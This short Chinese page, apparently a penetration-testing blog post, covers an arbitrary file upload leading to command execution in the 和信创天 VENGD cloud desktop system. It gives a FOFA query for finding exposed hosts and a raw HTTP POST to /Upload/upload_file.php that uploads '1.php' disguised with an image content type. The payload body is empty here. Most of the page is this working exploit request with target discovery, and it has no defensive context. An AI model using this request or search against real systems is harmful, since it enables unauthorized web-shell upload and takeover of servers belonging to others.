和信创天云桌面系统_命令执行_任意文件上传

fofa

title=“和信下一代云桌面VENGD”

漏洞复现

POST /Upload/upload_file.php?l=test HTTP/1.1
Host: X.X.X.X
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv

------WebKitFormBoundaryfcKRltGv
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/avif


------WebKitFormBoundaryfcKRltGv--

和信创天云桌面系统_命令执行_任意文件上传_第1张图片
和信创天云桌面系统_命令执行_任意文件上传_第2张图片

你可能感兴趣的:(渗透测试)